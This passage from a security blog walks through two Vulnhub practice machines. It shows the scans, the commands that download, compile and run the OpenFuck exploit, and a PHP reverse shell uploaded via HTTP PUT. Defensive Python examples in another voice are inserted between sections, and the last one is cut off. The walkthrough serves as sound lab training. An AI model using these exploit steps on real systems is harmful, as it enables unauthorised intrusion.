<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhirfiOPhOiiIY1o19s7JX0xBT5jZHCG5mcRk4xECN28cQiNRFaZ29ldTimzPHpBtsWswU1iJMkclz4TAPMG8I5JD9hNkRHPGv-8lkPrUPpOAOs8_8W5tVpCHikw-bE1Y2UHnJSVAdUyFY/s1600/Screenshot+from+2017-02-07+10-23-05.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="211" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhirfiOPhOiiIY1o19s7JX0xBT5jZHCG5mcRk4xECN28cQiNRFaZ29ldTimzPHpBtsWswU1iJMkclz4TAPMG8I5JD9hNkRHPGv-8lkPrUPpOAOs8_8W5tVpCHikw-bE1Y2UHnJSVAdUyFY/s400/Screenshot+from+2017-02-07+10-23-05.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
Looks like I need to choose -B0, -c (My IP), </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkDP6BTnTWyAWmHn3VEL7AHA8SioY4SuZaJzSYK1z5svo7QQu0pj7Ln6Rif6YyaHx8laCHL0De9UoahYiNF8Wxqbzin3i5_ZSxj3vZe_hplFGUpjOVYP6ONzmbhrddsUyoFPGOmi9htgw/s1600/Screenshot+from+2017-02-07+10-24-01.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="211" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkDP6BTnTWyAWmHn3VEL7AHA8SioY4SuZaJzSYK1z5svo7QQu0pj7Ln6Rif6YyaHx8laCHL0De9UoahYiNF8Wxqbzin3i5_ZSxj3vZe_hplFGUpjOVYP6ONzmbhrddsUyoFPGOmi9htgw/s400/Screenshot+from+2017-02-07+10-24-01.png" width="400" /></a></div>
<br />
So there we have it! Kioptrix 1 #tangodown<br />
<br /></div>
Volta Securityhttp://www.blogger.com/profile/16435992433390099875noreply@blogger.com0tag:blogger.com,1999:blog-4115963120017667746.post-6803037251481656662017-02-07T09:40:00.000+00:002017-02-08T14:19:38.025+00:00Kioptrix Level 1 (Via Web Vuln)<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
I have been absent from this blog for a while now. This is mainly due to the festivities, family and work. Now everything has calmed down, I can start "playing" again. I decided to ease back into things with the Kioptrix series from Vulnhub. This series is aimed to be easy and to be honest the first one was, "however" I ended up looking way too deep and not thinking simple!!<br />
<br />
So first things first.<br />
<br />
Let's start by using Netdiscover to see what IP the VM is on:<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlMzqC59NnuehCYr8RZHbrjrlZ5LwaQ4Am07wRvtey9rztPa4z7HKh_3xdBiUvGPGGJ4SUntTQd77njAkYVmhNOhnkKqkBafuzwFn8EUZKl-5g0fc_GbMdS-EtBWc0ZjhaYD3a0YJaqEI/s1600/Screenshot+from+2017-01-23+10-22-16.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlMzqC59NnuehCYr8RZHbrjrlZ5LwaQ4Am07wRvtey9rztPa4z7HKh_3xdBiUvGPGGJ4SUntTQd77njAkYVmhNOhnkKqkBafuzwFn8EUZKl-5g0fc_GbMdS-EtBWc0ZjhaYD3a0YJaqEI/s320/Screenshot+from+2017-01-23+10-22-16.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Netdiscover shows .132 is my IP of choice.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
I'll NMap ports 1-65535 on this IP, piping the output through grep to show only the open ports; I do this to get a cleaner output than just running NMap:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiw0bw4B6Pv9jgE7BZh8LFU3WoLkZ1l3MBsTu-7CyB9LVnwx0psTF5fezLBgkZMnt6sYaExoEWXqd-k1JpVpwA4K056Uomn1AA_TY6n6fN0Dat4kGdPLcdu-A57efJTdCHBGWRXIg4ei_8/s1600/Screenshot+from+2017-01-23+10-24-28.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;"><img border="0" height="79" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiw0bw4B6Pv9jgE7BZh8LFU3WoLkZ1l3MBsTu-7CyB9LVnwx0psTF5fezLBgkZMnt6sYaExoEWXqd-k1JpVpwA4K056Uomn1AA_TY6n6fN0Dat4kGdPLcdu-A57efJTdCHBGWRXIg4ei_8/s320/Screenshot+from+2017-01-23+10-24-28.png" width="320" /></a></div>
<br />
Now I have something to play with. I'll check out ports 80 & 443 first:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUBBYqq95ZT_lsLf9Bs0Le4xqP3MiEj5bGBOuxkzugC7XqF1RWGnImz8i30m3_m8_f1BtixcfA2Ulo84iVOPNMmDuL8qvOaJVBiQNoJvVIj6vYqEsWvhFJkLQw8-V7SVgTPnIAuaotF_U/s1600/Screenshot+from+2017-01-23+13-11-10.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUBBYqq95ZT_lsLf9Bs0Le4xqP3MiEj5bGBOuxkzugC7XqF1RWGnImz8i30m3_m8_f1BtixcfA2Ulo84iVOPNMmDuL8qvOaJVBiQNoJvVIj6vYqEsWvhFJkLQw8-V7SVgTPnIAuaotF_U/s320/Screenshot+from+2017-01-23+13-11-10.png" width="320" /></a></div>
<br />
Ports 80 & 443 give an Apache test page. I'll try dirb to see if anything is hidden.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXkqxbiWKH63Uo7B0QCkBfrNqYvOni9MeAFxMfpd_LHcr2x5qPKQ_keClqujNmawFk-COHoDQyJEUxEvzMg4YoStsgAmrJlN33e2SRCfz__vXbt9FENJwGVzU6GYFxyMkSCmpP1YNHiCc/s1600/Screenshot+from+2017-01-23+13-14-36.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXkqxbiWKH63Uo7B0QCkBfrNqYvOni9MeAFxMfpd_LHcr2x5qPKQ_keClqujNmawFk-COHoDQyJEUxEvzMg4YoStsgAmrJlN33e2SRCfz__vXbt9FENJwGVzU6GYFxyMkSCmpP1YNHiCc/s320/Screenshot+from+2017-01-23+13-14-36.png" width="320" /></a></div>
<br />
Nope, there's nothing there. I'll see if it's vulnerable in some way by using Nikto.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyq4LN60FnpHxro7J0hDe36ZHmlhmwkqRyTnxNymcWbK-77t91u9_mb26vGwhhMlZcVvtAi15WdjFH1uiFyXXzC4gelY7YsRQyeoRa1GuApyJ_584nbsGtclDrQZn4CmePascO6I3WwMc/s1600/Screenshot+from+2017-01-24+13-13-49.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyq4LN60FnpHxro7J0hDe36ZHmlhmwkqRyTnxNymcWbK-77t91u9_mb26vGwhhMlZcVvtAi15WdjFH1uiFyXXzC4gelY7YsRQyeoRa1GuApyJ_584nbsGtclDrQZn4CmePascO6I3WwMc/s320/Screenshot+from+2017-01-24+13-13-49.png" width="320" /></a></div>
<br />
It's time to start reading.<br />
<br />
After sifting through the various vulnerabilities that Nikto had found, I came across this exploit:<br />
<br />
<a href="https://www.exploit-db.com/exploits/764/">Open Fuck</a><br />
<br />
What a charming name!!!<br />
<br />
This exploit gave me an absolute headache. As I am using Kali 2 rolling, the version of OpenSSL is newer than the one the exploit was written against. So after a lot of digging and faffing, I managed to get it working. Here's how I did it:<br />
<br />
<pre class="brush: bash">apt-get install libssl1.0-dev
</pre>
<br />
This installs the older version of the SSL library. Once this was installed I could compile the exploit.<br />
<br />
<pre class="brush: bash">wget https://www.exploit-db.com/download/764</pre>
<br />
Once the exploit had downloaded, there was still work to do: I followed the guide here, <a href="http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/">Exploit Update</a>, to update the file.<br />
<br />
I then compiled the exploit:<br />
<br />
<pre class="brush: bash">gcc -o pwn 764 -lcrypto</pre>
<br />
This gave me my executable exploit to run. This exploit needed parameters in order to run correctly, namely:<br />
<br />
I needed to run </div>
<br />
<pre class="brush: bash">./pwn &lt;the os type&gt; &lt;ip&gt; -c &lt;open connections&gt;</pre>
<br />
I ran:<br />
<br />
<pre class="brush: bash">./pwn 0x6b 192.168.1.70 -c 40</pre>
<br />
And.......<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9R6lLpwd_952xnf7Sq5Zd6xBA_ku_3JxMausNEcLZ8gYQ6VHVo6HrVYFomGtBU_KwYivxeTcaG1fWnZTaYhIV2r866PFXsJM00PUzkyy2PY1IUNXSV1NtIEC_-8QmvWMzPTX1lDHoP3g/s1600/Screenshot+from+2017-02-07+09-35-07.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9R6lLpwd_952xnf7Sq5Zd6xBA_ku_3JxMausNEcLZ8gYQ6VHVo6HrVYFomGtBU_KwYivxeTcaG1fWnZTaYhIV2r866PFXsJM00PUzkyy2PY1IUNXSV1NtIEC_-8QmvWMzPTX1lDHoP3g/s400/Screenshot+from+2017-02-07+09-35-07.png" width="400" /></a></div>
<br />
I am....<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://cdn.meme.am/cache/instances/folder717/250x250/58354717.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://cdn.meme.am/cache/instances/folder717/250x250/58354717.jpg" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Awesome!!</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
There is another way to get (G)root via SMB so sit tight for round 2!!</div>
<br /></div>
Volta Securityhttp://www.blogger.com/profile/16435992433390099875noreply@blogger.com0tag:blogger.com,1999:blog-4115963120017667746.post-29508192009719667872016-10-09T18:07:00.000+01:002017-02-08T14:19:38.014+00:00Vulnhub SickOs 1.2<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
I appear to have a Vulnhub addiction ATM! I put this down to having a free weekend so I can hone my skills :)<br />
<br />
This VM was tricky towards the end as normal scripts etc didn't work. I certainly had to get outside the box for this one!! It is a great VM and you should definitely give it a go.<br />
<br />
So big thanks to <a href="https://twitter.com/vulnub">Vulnhub</a> and <a href="https://twitter.com/D4rk36">D4rk36</a> for this :)<br />
<br />
<br />
<b><u>scan</u></b><br />
<b><u><br /></u></b></div>
</div>
<span style="font-family: Courier New, Courier, monospace;">root@kali:~# nmap -Pn -sV -p 0-65535 192.168.1.7</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-10-08 16:11 BST</span><br />
<span style="font-family: Courier New, Courier, monospace;">Nmap scan report for 192.168.1.7</span><br />
<span style="font-family: Courier New, Courier, monospace;">Host is up (0.00030s latency).</span><br />
<span style="font-family: Courier New, Courier, monospace;">Not shown: 65534 filtered ports</span><br />
<span style="font-family: Courier New, Courier, monospace;">PORT STATE SERVICE VERSION</span><br />
<span style="font-family: Courier New, Courier, monospace;">22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)</span><br />
<span style="font-family: Courier New, Courier, monospace;">80/tcp open http lighttpd 1.4.28</span><br />
<span style="font-family: Courier New, Courier, monospace;">MAC Address: 00:0C:29:EB:E6:56 (VMware)</span><br />
<span style="font-family: Courier New, Courier, monospace;">Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br />
<span style="font-family: Courier New, Courier, monospace;">Nmap done: 1 IP address (1 host up) scanned in 124.06 seconds</span><br />
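The Kioptrix post above pipes NMap through grep to see only the open ports; the scan here is the same kind of output. As an added example (not part of this blog), here is a small Python parser for nmap's normal output that does that filtering and keeps the version column, so the result can be diffed or fed into an inventory. The sample input is the SickOs scan shown above, re-spaced into nmap's column layout; the function names are my own.<br />

```python
"""Parse nmap's normal output into open ports per host. Added example for
this blog (not the author's code); the sample is the SickOs 1.2 scan above."""
import re

SAMPLE_SCAN = """\
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-10-08 16:11 BST
Nmap scan report for 192.168.1.7
Host is up (0.00030s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    lighttpd 1.4.28
MAC Address: 00:0C:29:EB:E6:56 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 124.06 seconds
"""

# "Nmap scan report for 1.2.3.4" or "Nmap scan report for name (1.2.3.4)"
HOST_RE = re.compile(r"^Nmap scan report for (\S+)(?: \(([^)]+)\))?$")
# "22/tcp open ssh OpenSSH 5.9p1 ..."; the version column is absent without -sV
PORT_RE = re.compile(r"^(\d+)/(tcp|udp|sctp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_nmap_normal(text):
    """Return [{"host": str, "addr": str, "ports": [...]}, ...] for every
    host block in the output. Lines that are not host or port lines
    (banner, 'Not shown', MAC, Service Info, 'Nmap done') are ignored."""
    hosts = []
    current = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            name, addr = m.groups()
            current = {"host": name, "addr": addr or name, "ports": []}
            hosts.append(current)
            continue
        m = PORT_RE.match(line)
        if m and current is not None:
            port, proto, state, service, version = m.groups()
            current["ports"].append({
                "port": int(port),
                "proto": proto,
                "state": state,
                "service": service,
                "version": (version or "").strip(),
            })
    return hosts


def open_ports(host_entry):
    """Only the ports nmap reports as open (drops closed/filtered lines)."""
    return [p for p in host_entry["ports"] if p["state"] == "open"]


def summarise(hosts):
    """One line per open port: the same view as grepping for 'open', but
    with the address prefixed so multi-host scans stay readable."""
    lines = []
    for h in hosts:
        for p in open_ports(h):
            lines.append(
                f"{h['addr']} {p['port']}/{p['proto']} {p['service']} {p['version']}".rstrip()
            )
    return lines


if __name__ == "__main__":
    for line in summarise(parse_nmap_normal(SAMPLE_SCAN)):
        print(line)
```

Keeping the version string next to the port is what turns a port list into something actionable: "lighttpd 1.4.28" and "OpenSSH 5.9p1" are the facts the rest of this post, and any patch review, are built on.<br />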
<br />
<b><u><br /></u></b>
<b><u>ssh</u></b><br />
<b><u><br /></u></b>
<br />
<div class="page">
I'll see what ssh yields:<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~/Downloads# ssh 192.168.1.7</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> .oooooo..o o8o oooo .oooooo. .o .oooo. </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">d8P' `Y8 `"' `888 d8P' `Y8b o888 .dP""Y88b </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Y88bo. oooo .ooooo. 888 oooo 888 888 .oooo.o 888 ]8P'</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> `"Y8888o. `888 d88' `"Y8 888 .8P' 888 888 d88( "8 888 .d8P' </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> `"Y88b 888 888 888888. 888 888 `"Y88b. 888 .dP' </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">oo .d8P 888 888 .o8 888 `88b. `88b d88' o. )88b 888 .o. .oP .o</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">8""88888P' o888o `Y8bod8P' o888o o888o `Y8bood8P' 8""888P' o888o Y8P 8888888888</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">By @D4rk36</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@192.168.1.7's password: </span><br />
<br />
Not a lot apart from nice ASCII art :D<br />
<br />
I'll try port 80 then!<br />
<b style="font-family: "Open Sans", sans-serif;"><u><br /></u></b>
<b style="font-family: "Open Sans", sans-serif;"><u>http</u></b><br />
<br style="font-family: "Open Sans", sans-serif; font-size: 13px;" />
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">Navigating to the IP gives the following page.</span><br />
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span>
<br />
</div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgT0SG83rc6UNMR5z3rJX7LhHEusmIdtCF9___b2ihf_mzoT9pJS1z6igecR9ytGywBTb-_M15jAhy-8G90a0dHV6jLw5Z7TBC1qjb-8EpLiLsL81Wh8Pfln7p7AmmX_bydl1JLVEoCbC4/s1600/1-1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="317" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgT0SG83rc6UNMR5z3rJX7LhHEusmIdtCF9___b2ihf_mzoT9pJS1z6igecR9ytGywBTb-_M15jAhy-8G90a0dHV6jLw5Z7TBC1qjb-8EpLiLsL81Wh8Pfln7p7AmmX_bydl1JLVEoCbC4/s320/1-1.png" width="320" /></a></div>
<br />
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">The source code contains no hints, so I'll see if there is anything hidden:</span><br />
<div style="text-align: left;">
<br />
<pre class="brush: bash">root@kali:~/Downloads# dirb http://192.168.1.7 -w

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Oct 8 16:22:08 2016
URL_BASE: http://192.168.1.7/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Stoping on warning messages

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.7/ ----
+ http://192.168.1.7/index.php (CODE:200|SIZE:163)
==> DIRECTORY: http://192.168.1.7/test/

---- Entering directory: http://192.168.1.7/test/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
</pre></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">Let's see what /test yields:</span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMp7Wxn4yVjgb-7nv1c7JOsHAkkXy_Toh-g2tplaZ-EhijeLna6G5-ceojRekvl78PK6_yQGiE8CmIRWXwHetyr2QxwrGjN-Kae5mDxrjd2Y-SFySznzDC_xMOes7PhAKCXHLSMhGCTec/s1600/1-2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMp7Wxn4yVjgb-7nv1c7JOsHAkkXy_Toh-g2tplaZ-EhijeLna6G5-ceojRekvl78PK6_yQGiE8CmIRWXwHetyr2QxwrGjN-Kae5mDxrjd2Y-SFySznzDC_xMOes7PhAKCXHLSMhGCTec/s400/1-2.png" width="400" /></a></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span>
<div style="text-align: left;">
<span style="font-family: "open sans", sans-serif; font-size: 13px;">Hmmm....</span></div>
<br style="font-family: "Open Sans", sans-serif; font-size: 13px;" />
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">I try to see if there is anything in the way of known weaknesses in lighttpd/1.4.28, but I come away empty-handed.</span><br />
<br style="font-family: "Open Sans", sans-serif; font-size: 13px;" />
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">There must be a way to upload to this page....... Hang on!!! What methods are available on this web page? Can I PUT??</span><br />
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
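The question being asked here, which HTTP methods the server answers to, is one worth asking of your own web roots before anyone else does. As an added example (not code from this post or the SickOs VM), here is a Python audit of a raw OPTIONS response that collects every method across all Allow headers and reports the write-capable ones, and whether they are exposed without authentication. The two responses in the block are constructed for illustration, not captures from the VM, and the function names are my own.<br />

```python
"""Audit an HTTP OPTIONS response for write-capable methods. Added example
for this walkthrough (not the author's or the VM's code); the responses
below are constructed, not captured from the SickOs box."""

# Methods that change content on the server. Any of these on an anonymous
# web root is the misconfiguration this post goes on to use (PUT).
WRITE_METHODS = frozenset(
    {"PUT", "DELETE", "PATCH", "MKCOL", "MOVE", "COPY", "PROPPATCH"}
)

# Constructed: what a WebDAV-enabled directory might answer.
WEBDAV_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "DAV: 1,2\r\n"
    "Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK\r\n"
    "Allow: OPTIONS, GET, HEAD, POST\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

# Constructed: a read-only web root.
READONLY_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Allow: OPTIONS, GET, HEAD, POST\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)


def parse_response_headers(raw):
    """Split a raw response into (status_code, {lower-name: [values]}).
    Repeated headers (two Allow lines here) are all kept, and parsing stops
    at the blank line so nothing in the body is mistaken for a header."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    parts = lines[0].split()
    if len(parts) < 2 or not parts[0].startswith("HTTP/"):
        raise ValueError("not an HTTP response: %r" % lines[0])
    status = int(parts[1])
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers


def allowed_methods(headers):
    """Union of every method named in every Allow header, upper-cased."""
    methods = set()
    for value in headers.get("allow", []):
        methods.update(m.strip().upper() for m in value.split(",") if m.strip())
    return methods


def audit_options_response(raw):
    """Findings for one OPTIONS response. 'anonymous_write' is True only
    when write methods are advertised and nothing indicates they are gated
    (no 401, no WWW-Authenticate)."""
    status, headers = parse_response_headers(raw)
    methods = allowed_methods(headers)
    write = sorted(methods & WRITE_METHODS)
    return {
        "status": status,
        "methods": sorted(methods),
        "write_methods": write,
        "anonymous_write": bool(write)
        and status != 401
        and "www-authenticate" not in headers,
    }


if __name__ == "__main__":
    for name, raw in (("webdav", WEBDAV_RESPONSE), ("readonly", READONLY_RESPONSE)):
        print(name, audit_options_response(raw))
```

A clean Allow header is not proof of safety (a server can accept a method it does not advertise), so treat an empty result as "nothing found", and a non-empty one as a finding to fix in the server configuration rather than to hide from OPTIONS.<br />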
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1LmbRzsxXaeNzpM8quGXrp-GxxwRwXN2nRBv3iqxHRW1t-QexTYr9_j7R1Nsc0pfIMXfQ6lsxRk_ZEEaMI3jS-SFvWs4hE9GLBISazjHG3xBByZqDvyXYjP_rviFoDFGQhqG6cq_npWQ/s1600/1-3.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1LmbRzsxXaeNzpM8quGXrp-GxxwRwXN2nRBv3iqxHRW1t-QexTYr9_j7R1Nsc0pfIMXfQ6lsxRk_ZEEaMI3jS-SFvWs4hE9GLBISazjHG3xBByZqDvyXYjP_rviFoDFGQhqG6cq_npWQ/s400/1-3.png" width="400" /></a></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">Phew!! I can PUT here. Now to find out how I can achieve this!! Ideally I want a reverse shell so pentestmonkey's one should do!! (</span><a href="http://pentestmonkey.net/tools/web-shells/php-reverse-shell" style="font-family: "Open Sans", sans-serif; font-size: 13px;">http://pentestmonkey.net/tools/web-shells/php-reverse-shell</a><span style="font-family: "open sans" , sans-serif; font-size: 13px;">)</span><br />
<br style="font-family: "Open Sans", sans-serif; font-size: 13px;" />
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">I upload it using nmap's scripting engine:</span><br />
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhujHH9YI2InoKqnwghRtp_BrBDWZZrhjmNoRK55M64rQ7zFOpap_HpHJqgGauQ7MPa83XFpvLrtkXFtDQ3KEhVSbAheBrsbq8UV5tHKLFmKj-PgHNQRW_JwSPPedZj6nSh6F4TmE1YFb8/s1600/1-4.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhujHH9YI2InoKqnwghRtp_BrBDWZZrhjmNoRK55M64rQ7zFOpap_HpHJqgGauQ7MPa83XFpvLrtkXFtDQ3KEhVSbAheBrsbq8UV5tHKLFmKj-PgHNQRW_JwSPPedZj6nSh6F4TmE1YFb8/s400/1-4.png" width="400" /></a></div>
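On the defender's side, the upload step above leaves a clear trace in the web server's access log: a PUT for a script path that the server answered with 2xx, followed by GET requests to that same path carrying a command parameter. The Python below is an added example (not the author's or nmap's code) that pulls both out of constructed Apache combined-format log lines; the path /shell.php, the client addresses and the timestamps are assumptions, not values from the post.

```python
"""Access-log detection for the upload step on this page: a PUT that writes
a server-side script into the web root, then the requests that invoke it.
All log lines below are constructed; the path /shell.php, client addresses
and timestamps are assumptions, not values from the original post."""
import re
from typing import Dict, List, Set

# Apache/nginx "combined" format:
#   client ident user [time] "METHOD path proto" status size "referer" "agent"
COMBINED_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Extensions the server executes instead of serving as static content.
SCRIPT_EXTS = (".php", ".phtml", ".php5", ".phar", ".jsp", ".asp", ".aspx")

# Methods that create a file on the server over HTTP/WebDAV.
WRITE_METHODS = {"PUT", "MOVE", "COPY"}


def find_put_uploads(log_lines: List[str]) -> List[Dict[str, object]]:
    """Accepted (2xx) write requests whose target is a script path."""
    hits = []
    for line in log_lines:
        m = COMBINED_RE.match(line)
        if m is None:
            continue  # other log format or truncated line: skip, never crash
        path, status = m["path"].split("?", 1)[0], int(m["status"])
        if (m["method"] in WRITE_METHODS and 200 <= status < 300
                and path.lower().endswith(SCRIPT_EXTS)):
            hits.append({"client": m["client"], "time": m["time"],
                         "method": m["method"], "path": path, "status": status})
    return hits


def find_webshell_use(log_lines: List[str], uploaded: Set[str]) -> List[Dict[str, str]]:
    """Requests to an uploaded path that carry a query string, i.e. the
    ?cmd=... invocations shown later on this page."""
    hits = []
    for line in log_lines:
        m = COMBINED_RE.match(line)
        if m is None:
            continue
        path, _, query = m["path"].partition("?")
        if path in uploaded and query:
            hits.append({"client": m["client"], "path": path, "query": query})
    return hits


SAMPLE_LOG = [  # constructed sample lines
    '192.168.1.8 - - [16/Feb/2017:14:30:01 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '192.168.1.8 - - [16/Feb/2017:14:30:07 +0000] "OPTIONS / HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '192.168.1.8 - - [16/Feb/2017:14:30:12 +0000] "PUT /shell.php HTTP/1.1" 201 0 "-" "Mozilla/5.0"',
    '192.168.1.8 - - [16/Feb/2017:14:30:20 +0000] "GET /shell.php?cmd=id HTTP/1.1" 200 54 "-" "Mozilla/5.0"',
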